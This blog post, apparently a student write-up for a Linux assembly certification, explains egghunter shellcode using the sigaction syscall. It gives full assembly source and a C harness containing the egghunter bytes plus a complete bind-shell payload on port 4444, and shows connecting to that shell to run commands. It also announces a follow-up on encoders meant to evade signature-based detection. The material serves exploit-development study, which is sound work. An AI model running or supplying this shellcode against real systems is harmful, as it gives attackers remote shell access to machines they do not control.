Egghunters

Posted on by badbit

To define in a single line, egg hunting is the process of searching a process’s Address Space in a reliable manner for a given key (egg).

Egg-hunt (Wikipedia)

This is another form of staged shellcode, which is used if an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. Small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process’s address space for the larger shellcode (the egg) and executes it.

In this blogpost, we will create our own Egghunter shellcode which will execute /bin/bash. We will implement one of the methods from the amazing research done by Skape about “Safely Searching Process Virtual Address Space“.

We will use the sigaction approach as mentioned in Skape’s research. As seen in the man refernce below, the syscall “sigaction” takes the following arguments:

EAX = 67
EBX = signum
ECX = *act
EDX = *oldact

The goal here will be to use the act structure as the pointer for validating a larger region of memory than a single byte. I won’t be going any further in the details of the syscall as the research paper already covers it in great extent.

Below is the shellcode which uses 0x50905090 as the key (egg) and hunts for it in the address space. As soon as the compare operation succeeds, the flow is redirected to the actual payload.

global _start

section .text
_start:

verify_area:
	or cx,0xfff ; page alignment

hunt_addr:
	inc ecx
	push 0x43 ; Syscall 67 - sigaction
	pop eax
	int 0x80

	cmp al,0xf2 ; Compare return value of the syscall against low byte of EFAULT value
	jz verify_area ; If efault is produced, i.e the memory region doesn't exist -> Loop incrementing ecx

	mov eax,0x50905090 ; Move egg in eax for SCASD operation
	mov edi,ecx ; Pointer to in-memory string to be compared moved in edi

	scasd ; Compare first part of the egg

	jnz hunt_addr ; If the egg does not match, loop incrementing the address

	scasd  ; Compare second part of the egg

	jnz hunt_addr ; Loop again if no match

	jmp edi ; Jump to the payload if match successful

Now we will generate shellcode using the cli-fu as shown in previous posts from the above asm code and use it in our C harness.

Below is our C harness which contains our egghunter shellcode from above and the bind shell shellcode from the first post of the series. Do note how we have appended our key to the actual shellcode. 

// Author - badbit
// Egghunter shellcode spawning a bind shell on localhost:4444 

#include <stdio.h>
#include <string.h>


char egghunter[] = "\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";


char shellcode[] = \
"\x90\x50\x90\x50"
"\x90\x50\x90\x50"
"\x31\xc0\x31\xdb\x31\xc9\xb3\x01\x51\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc6\xb0\x66\x31\xdb\x53\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x02\xcd\x80\xb0\x66\x31\xdb\x53\x56\x89\xe1\xb3\x04\xcd\x80\xb0\x66\x31\xdb\x53\x53\x56\x89\xe1\xb3\x05\xcd\x80\x89\xc3\xb9\x02\x00\x00\x00\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc9\x89\xca\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";



int main()
{
	printf("[+] Shell bound to port 4444.\n");
	printf("[+] Original shellcode length : %d\n", strlen((char*)shellcode)-8);
	printf("[+] Length of egghunter : %d\n\n\n", strlen((char*)egghunter));

	int (*ret)() = (int(*)())egghunter;
	ret();

}

Compiling the above with the stack marked as executable, and running it, we get the below output:

On the right window, we can see our payload successfully executing and on the left we can see that we are conencted to our bind shell and successfully executing commands on the host.

Resources:

  1. The original research by Skape – http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
  2. Brilliant article on Egghunters (Windows) by HackSysTeam – https://www.exploit-db.com/docs/english/18482-egg-hunter—a-twist-in-buffer-overflow.pdf

That’s all for this blog post.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-14690

Egghunter shellcode Github Repo

In the next blog post, we will create our own Custom Encoder scheme which can be used to defeat signature based detection schemes.

Leave a Reply

Your email address will not be published. Required fields are marked *